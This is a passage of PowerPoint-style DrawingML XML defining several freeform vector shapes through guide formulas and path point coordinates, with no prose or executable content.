                  <a:gd name="T22" fmla="*/ 152 w 589"/>
                  <a:gd name="T23" fmla="*/ 237 h 495"/>
                  <a:gd name="T24" fmla="*/ 131 w 589"/>
                  <a:gd name="T25" fmla="*/ 253 h 495"/>
                  <a:gd name="T26" fmla="*/ 110 w 589"/>
                  <a:gd name="T27" fmla="*/ 289 h 495"/>
                  <a:gd name="T28" fmla="*/ 110 w 589"/>
                  <a:gd name="T29" fmla="*/ 305 h 495"/>
                  <a:gd name="T30" fmla="*/ 115 w 589"/>
                  <a:gd name="T31" fmla="*/ 326 h 495"/>
                  <a:gd name="T32" fmla="*/ 136 w 589"/>
                  <a:gd name="T33" fmla="*/ 352 h 495"/>
                  <a:gd name="T34" fmla="*/ 167 w 589"/>
                  <a:gd name="T35" fmla="*/ 363 h 495"/>
                  <a:gd name="T36" fmla="*/ 184 w 589"/>
                  <a:gd name="T37" fmla="*/ 363 h 495"/>
                  <a:gd name="T38" fmla="*/ 262 w 589"/>
                  <a:gd name="T39" fmla="*/ 337 h 495"/>
                  <a:gd name="T40" fmla="*/ 320 w 589"/>
                  <a:gd name="T41" fmla="*/ 462 h 495"/>
                  <a:gd name="T42" fmla="*/ 225 w 589"/>
                  <a:gd name="T43" fmla="*/ 489 h 495"/>
                  <a:gd name="T44" fmla="*/ 147 w 589"/>
                  <a:gd name="T45" fmla="*/ 489 h 495"/>
                  <a:gd name="T46" fmla="*/ 110 w 589"/>
                  <a:gd name="T47" fmla="*/ 473 h 495"/>
                  <a:gd name="T48" fmla="*/ 52 w 589"/>
                  <a:gd name="T49" fmla="*/ 410 h 495"/>
                  <a:gd name="T50" fmla="*/ 26 w 589"/>
                  <a:gd name="T51" fmla="*/ 363 h 495"/>
                  <a:gd name="T52" fmla="*/ 0 w 589"/>
                  <a:gd name="T53" fmla="*/ 268 h 495"/>
                  <a:gd name="T54" fmla="*/ 0 w 589"/>
                  <a:gd name="T55" fmla="*/ 226 h 495"/>
                  <a:gd name="T56" fmla="*/ 15 w 589"/>
                  <a:gd name="T57" fmla="*/ 190 h 495"/>
                  <a:gd name="T58" fmla="*/ 84 w 589"/>
                  <a:gd name="T59" fmla="*/ 116 h 495"/>
                  <a:gd name="T60" fmla="*/ 136 w 589"/>
                  <a:gd name="T61" fmla="*/ 79 h 495"/>
                  <a:gd name="T62" fmla="*/ 204 w 589"/>
                  <a:gd name="T63" fmla="*/ 47 h 495"/>
                  <a:gd name="T64" fmla="*/ 341 w 589"/>
                  <a:gd name="T65" fmla="*/ 0 h 495"/>
                  <a:gd name="T66" fmla="*/ 393 w 589"/>
                  <a:gd name="T67" fmla="*/ 0 h 495"/>
                  <a:gd name="T68" fmla="*/ 441 w 589"/>
                  <a:gd name="T69" fmla="*/ 6 h 495"/>
                  <a:gd name="T70" fmla="*/ 514 w 589"/>
                  <a:gd name="T71" fmla="*/ 53 h 495"/>
                  <a:gd name="T72" fmla="*/ 540 w 589"/>
                  <a:gd name="T73" fmla="*/ 90 h 495"/>
                  <a:gd name="T74" fmla="*/ 567 w 589"/>
                  <a:gd name="T75" fmla="*/ 132 h 495"/>
                  <a:gd name="T76" fmla="*/ 588 w 589"/>
                  <a:gd name="T77" fmla="*/ 216 h 495"/>
                  <a:gd name="T78" fmla="*/ 572 w 589"/>
                  <a:gd name="T79" fmla="*/ 294 h 495"/>
                  <a:gd name="T80" fmla="*/ 556 w 589"/>
                  <a:gd name="T81" fmla="*/ 326 h 495"/>
                  <a:gd name="T82" fmla="*/ 493 w 589"/>
                  <a:gd name="T83" fmla="*/ 378 h 495"/>
                  <a:gd name="T84" fmla="*/ 393 w 589"/>
                  <a:gd name="T85" fmla="*/ 279 h 495"/>
                  <a:gd name="T86" fmla="*/ 430 w 589"/>
                  <a:gd name="T87" fmla="*/ 258 h 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589" h="495">
                    <a:moveTo>
                      <a:pt x="430" y="258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="430" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="258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7" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7337425" y="2811463"/>
                <a:ext cx="231775" cy="214312"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 646"/>
                  <a:gd name="T1" fmla="*/ 441 h 595"/>
                  <a:gd name="T2" fmla="*/ 136 w 646"/>
                  <a:gd name="T3" fmla="*/ 441 h 595"/>
                  <a:gd name="T4" fmla="*/ 94 w 646"/>
                  <a:gd name="T5" fmla="*/ 426 h 595"/>
                  <a:gd name="T6" fmla="*/ 73 w 646"/>
                  <a:gd name="T7" fmla="*/ 415 h 595"/>
                  <a:gd name="T8" fmla="*/ 58 w 646"/>
                  <a:gd name="T9" fmla="*/ 404 h 595"/>
                  <a:gd name="T10" fmla="*/ 58 w 646"/>
                  <a:gd name="T11" fmla="*/ 404 h 595"/>
                  <a:gd name="T12" fmla="*/ 31 w 646"/>
                  <a:gd name="T13" fmla="*/ 373 h 595"/>
                  <a:gd name="T14" fmla="*/ 15 w 646"/>
                  <a:gd name="T15" fmla="*/ 331 h 595"/>
                  <a:gd name="T16" fmla="*/ 15 w 646"/>
                  <a:gd name="T17" fmla="*/ 331 h 595"/>
                  <a:gd name="T18" fmla="*/ 5 w 646"/>
                  <a:gd name="T19" fmla="*/ 300 h 595"/>
                  <a:gd name="T20" fmla="*/ 0 w 646"/>
                  <a:gd name="T21" fmla="*/ 273 h 595"/>
                  <a:gd name="T22" fmla="*/ 5 w 646"/>
                  <a:gd name="T23" fmla="*/ 247 h 595"/>
                  <a:gd name="T24" fmla="*/ 11 w 646"/>
                  <a:gd name="T25" fmla="*/ 221 h 595"/>
                  <a:gd name="T26" fmla="*/ 11 w 646"/>
                  <a:gd name="T27" fmla="*/ 221 h 595"/>
                  <a:gd name="T28" fmla="*/ 26 w 646"/>
                  <a:gd name="T29" fmla="*/ 200 h 595"/>
                  <a:gd name="T30" fmla="*/ 47 w 646"/>
                  <a:gd name="T31" fmla="*/ 179 h 595"/>
                  <a:gd name="T32" fmla="*/ 73 w 646"/>
                  <a:gd name="T33" fmla="*/ 158 h 595"/>
                  <a:gd name="T34" fmla="*/ 110 w 646"/>
                  <a:gd name="T35" fmla="*/ 142 h 595"/>
                  <a:gd name="T36" fmla="*/ 499 w 646"/>
                  <a:gd name="T37" fmla="*/ 0 h 595"/>
                  <a:gd name="T38" fmla="*/ 551 w 646"/>
                  <a:gd name="T39" fmla="*/ 137 h 595"/>
                  <a:gd name="T40" fmla="*/ 189 w 646"/>
                  <a:gd name="T41" fmla="*/ 268 h 595"/>
                  <a:gd name="T42" fmla="*/ 189 w 646"/>
                  <a:gd name="T43" fmla="*/ 268 h 595"/>
                  <a:gd name="T44" fmla="*/ 158 w 646"/>
                  <a:gd name="T45" fmla="*/ 284 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 646"/>
                  <a:gd name="T47" fmla="*/ 305 h 595"/>
                  <a:gd name="T48" fmla="*/ 136 w 646"/>
                  <a:gd name="T49" fmla="*/ 305 h 595"/>
                  <a:gd name="T50" fmla="*/ 131 w 646"/>
                  <a:gd name="T51" fmla="*/ 326 h 595"/>
                  <a:gd name="T52" fmla="*/ 136 w 646"/>
                  <a:gd name="T53" fmla="*/ 352 h 595"/>
                  <a:gd name="T54" fmla="*/ 136 w 646"/>
                  <a:gd name="T55" fmla="*/ 352 h 595"/>
                  <a:gd name="T56" fmla="*/ 141 w 646"/>
                  <a:gd name="T57" fmla="*/ 368 h 595"/>
                  <a:gd name="T58" fmla="*/ 152 w 646"/>
                  <a:gd name="T59" fmla="*/ 384 h 595"/>
                  <a:gd name="T60" fmla="*/ 162 w 646"/>
                  <a:gd name="T61" fmla="*/ 394 h 595"/>
                  <a:gd name="T62" fmla="*/ 178 w 646"/>
                  <a:gd name="T63" fmla="*/ 399 h 595"/>
                  <a:gd name="T64" fmla="*/ 194 w 646"/>
                  <a:gd name="T65" fmla="*/ 404 h 595"/>
                  <a:gd name="T66" fmla="*/ 210 w 646"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 252 w 646"/>
                  <a:gd name="T69" fmla="*/ 394 h 595"/>
                  <a:gd name="T70" fmla="*/ 598 w 646"/>
                  <a:gd name="T71" fmla="*/ 263 h 595"/>
                  <a:gd name="T72" fmla="*/ 645 w 646"/>
                  <a:gd name="T73" fmla="*/ 399 h 595"/>
                  <a:gd name="T74" fmla="*/ 121 w 646"/>
                  <a:gd name="T75" fmla="*/ 594 h 595"/>
                  <a:gd name="T76" fmla="*/ 73 w 646"/>
                  <a:gd name="T77" fmla="*/ 462 h 595"/>
                  <a:gd name="T78" fmla="*/ 136 w 646"/>
                  <a:gd name="T79" fmla="*/ 441 h 5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46" h="595">
                    <a:moveTo>
                      <a:pt x="136" y="441"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="136" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="441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8" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7389813" y="2998788"/>
                <a:ext cx="228600" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 636"/>
                  <a:gd name="T1" fmla="*/ 131 h 316"/>
                  <a:gd name="T2" fmla="*/ 504 w 636"/>
                  <a:gd name="T3" fmla="*/ 152 h 316"/>
                  <a:gd name="T4" fmla="*/ 504 w 636"/>
                  <a:gd name="T5" fmla="*/ 152 h 316"/>
                  <a:gd name="T6" fmla="*/ 504 w 636"/>
                  <a:gd name="T7" fmla="*/ 152 h 316"/>
                  <a:gd name="T8" fmla="*/ 546 w 636"/>
                  <a:gd name="T9" fmla="*/ 168 h 316"/>
                  <a:gd name="T10" fmla="*/ 582 w 636"/>
                  <a:gd name="T11" fmla="*/ 184 h 316"/>
                  <a:gd name="T12" fmla="*/ 582 w 636"/>
                  <a:gd name="T13" fmla="*/ 184 h 316"/>
                  <a:gd name="T14" fmla="*/ 598 w 636"/>
                  <a:gd name="T15" fmla="*/ 200 h 316"/>
                  <a:gd name="T16" fmla="*/ 609 w 636"/>
                  <a:gd name="T17" fmla="*/ 215 h 316"/>
                  <a:gd name="T18" fmla="*/ 619 w 636"/>
                  <a:gd name="T19" fmla="*/ 231 h 316"/>
                  <a:gd name="T20" fmla="*/ 630 w 636"/>
                  <a:gd name="T21" fmla="*/ 252 h 316"/>
                  <a:gd name="T22" fmla="*/ 630 w 636"/>
                  <a:gd name="T23" fmla="*/ 252 h 316"/>
                  <a:gd name="T24" fmla="*/ 630 w 636"/>
                  <a:gd name="T25" fmla="*/ 262 h 316"/>
                  <a:gd name="T26" fmla="*/ 630 w 636"/>
                  <a:gd name="T27" fmla="*/ 262 h 316"/>
                  <a:gd name="T28" fmla="*/ 635 w 636"/>
                  <a:gd name="T29" fmla="*/ 278 h 316"/>
                  <a:gd name="T30" fmla="*/ 504 w 636"/>
                  <a:gd name="T31" fmla="*/ 315 h 316"/>
                  <a:gd name="T32" fmla="*/ 504 w 636"/>
                  <a:gd name="T33" fmla="*/ 315 h 316"/>
                  <a:gd name="T34" fmla="*/ 498 w 636"/>
                  <a:gd name="T35" fmla="*/ 294 h 316"/>
                  <a:gd name="T36" fmla="*/ 498 w 636"/>
                  <a:gd name="T37" fmla="*/ 294 h 316"/>
                  <a:gd name="T38" fmla="*/ 493 w 636"/>
                  <a:gd name="T39" fmla="*/ 273 h 316"/>
                  <a:gd name="T40" fmla="*/ 493 w 636"/>
                  <a:gd name="T41" fmla="*/ 273 h 316"/>
                  <a:gd name="T42" fmla="*/ 478 w 636"/>
                  <a:gd name="T43" fmla="*/ 236 h 316"/>
                  <a:gd name="T44" fmla="*/ 478 w 636"/>
                  <a:gd name="T45" fmla="*/ 236 h 316"/>
                  <a:gd name="T46" fmla="*/ 462 w 636"/>
                  <a:gd name="T47" fmla="*/ 221 h 316"/>
                  <a:gd name="T48" fmla="*/ 451 w 636"/>
                  <a:gd name="T49" fmla="*/ 210 h 316"/>
                  <a:gd name="T50" fmla="*/ 451 w 636"/>
                  <a:gd name="T51" fmla="*/ 210 h 316"/>
                  <a:gd name="T52" fmla="*/ 430 w 636"/>
                  <a:gd name="T53" fmla="*/ 200 h 316"/>
                  <a:gd name="T54" fmla="*/ 409 w 636"/>
                  <a:gd name="T55" fmla="*/ 194 h 316"/>
                  <a:gd name="T56" fmla="*/ 409 w 636"/>
                  <a:gd name="T57" fmla="*/ 194 h 316"/>
                  <a:gd name="T58" fmla="*/ 388 w 636"/>
                  <a:gd name="T59" fmla="*/ 194 h 316"/>
                  <a:gd name="T60" fmla="*/ 362 w 636"/>
                  <a:gd name="T61" fmla="*/ 200 h 316"/>
                  <a:gd name="T62" fmla="*/ 42 w 636"/>
                  <a:gd name="T63" fmla="*/ 294 h 316"/>
                  <a:gd name="T64" fmla="*/ 0 w 636"/>
                  <a:gd name="T65" fmla="*/ 157 h 316"/>
                  <a:gd name="T66" fmla="*/ 535 w 636"/>
                  <a:gd name="T67" fmla="*/ 0 h 316"/>
                  <a:gd name="T68" fmla="*/ 577 w 636"/>
                  <a:gd name="T69" fmla="*/ 131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36" h="316">
                    <a:moveTo>
                      <a:pt x="577" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="131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9" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7423150" y="3103563"/>
                <a:ext cx="274638" cy="117475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 578 w 763"/>
                  <a:gd name="T1" fmla="*/ 184 h 326"/>
                  <a:gd name="T2" fmla="*/ 37 w 763"/>
                  <a:gd name="T3" fmla="*/ 325 h 326"/>
                  <a:gd name="T4" fmla="*/ 0 w 763"/>
                  <a:gd name="T5" fmla="*/ 184 h 326"/>
                  <a:gd name="T6" fmla="*/ 541 w 763"/>
                  <a:gd name="T7" fmla="*/ 47 h 326"/>
                  <a:gd name="T8" fmla="*/ 578 w 763"/>
                  <a:gd name="T9" fmla="*/ 184 h 326"/>
                  <a:gd name="T10" fmla="*/ 762 w 763"/>
                  <a:gd name="T11" fmla="*/ 137 h 326"/>
                  <a:gd name="T12" fmla="*/ 646 w 763"/>
                  <a:gd name="T13" fmla="*/ 168 h 326"/>
                  <a:gd name="T14" fmla="*/ 609 w 763"/>
                  <a:gd name="T15" fmla="*/ 31 h 326"/>
                  <a:gd name="T16" fmla="*/ 725 w 763"/>
                  <a:gd name="T17" fmla="*/ 0 h 326"/>
                  <a:gd name="T18" fmla="*/ 762 w 763"/>
                  <a:gd name="T19" fmla="*/ 137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63" h="326">
                    <a:moveTo>
                      <a:pt x="578" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="184"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="646" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="137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0" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7451725" y="3198813"/>
                <a:ext cx="258763" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 720"/>
                  <a:gd name="T1" fmla="*/ 179 h 411"/>
                  <a:gd name="T2" fmla="*/ 562 w 720"/>
                  <a:gd name="T3" fmla="*/ 210 h 411"/>
                  <a:gd name="T4" fmla="*/ 577 w 720"/>
                  <a:gd name="T5" fmla="*/ 294 h 411"/>
                  <a:gd name="T6" fmla="*/ 483 w 720"/>
                  <a:gd name="T7" fmla="*/ 310 h 411"/>
                  <a:gd name="T8" fmla="*/ 467 w 720"/>
                  <a:gd name="T9" fmla="*/ 232 h 411"/>
                  <a:gd name="T10" fmla="*/ 168 w 720"/>
                  <a:gd name="T11" fmla="*/ 294 h 411"/>
                  <a:gd name="T12" fmla="*/ 168 w 720"/>
                  <a:gd name="T13" fmla="*/ 294 h 411"/>
                  <a:gd name="T14" fmla="*/ 142 w 720"/>
                  <a:gd name="T15" fmla="*/ 300 h 411"/>
                  <a:gd name="T16" fmla="*/ 126 w 720"/>
